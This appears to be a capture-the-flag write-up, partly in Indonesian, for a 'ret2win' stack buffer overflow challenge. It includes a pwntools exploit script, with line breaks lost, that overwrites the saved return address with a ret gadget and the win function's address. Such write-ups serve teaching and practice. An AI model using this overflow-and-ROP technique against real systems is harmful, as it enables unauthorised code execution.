Buffer overflow di stack bisa kita gunakan untuk overwrite saved RIP. Kita bisa overwrite dengan alamat fungsi win untuk menjalankannya.
Author: zran
Simple buffer overflow challenge, but the only roadblock for me was stack alignment on the remote so i learned how to use ROPgadget to find a simple ret gadget to solve this.
#!/usr/bin/env python3# -*- coding: utf-8 -*-# This exploit template was generated via:# $ pwn template ret2win --host playground.tcp1p.team --port 19000from pwn import*# Set up pwntools for the correct architectureexe = context.binary =ELF(args.EXE or'ret2win')# Many built-in settings can be controlled on the command-line and show up# in "args". For example, to dump all data sent/received, and disable ASLR# for all created processes...# ./exploit.py DEBUG NOASLR# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executablehost = args.HOST or'playground.tcp1p.team'port =int(args.PORT or19000)defstart_local(argv=[],*a,**kw):'''Execute the target binary locally'''if args.GDB:return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)else:returnprocess([exe.path] + argv, *a, **kw)defstart_remote(argv=[],*a,**kw):'''Connect to the process on the remote host''' io =connect(host, port)if args.GDB: gdb.attach(io, gdbscript=gdbscript)return iodefstart(argv=[],*a,**kw):'''Start the exploit against the target.'''if args.LOCAL:returnstart_local(argv, *a, **kw)else:returnstart_remote(argv, *a, **kw)# Specify your GDB script here for debugging# GDB will be launched if the exploit is run via e.g.# ./exploit.py GDBgdbscript ='''tbreak maincontinue'''.format(**locals())#===========================================================# EXPLOIT GOES HERE#===========================================================# Arch: amd64-64-little# RELRO: Partial RELRO# Stack: No canary found# NX: NX enabled# PIE: No PIE (0x400000)# SHSTK: Enabled# IBT: Enabled# Stripped: Noio =start()ret =p64(0x40118f)win =p64(0x401216)payload =b'A'*120payload += retpayload += winlog.info(payload)log.info(io.clean())io.sendline(payload)log.info(io.clean())io.interactive()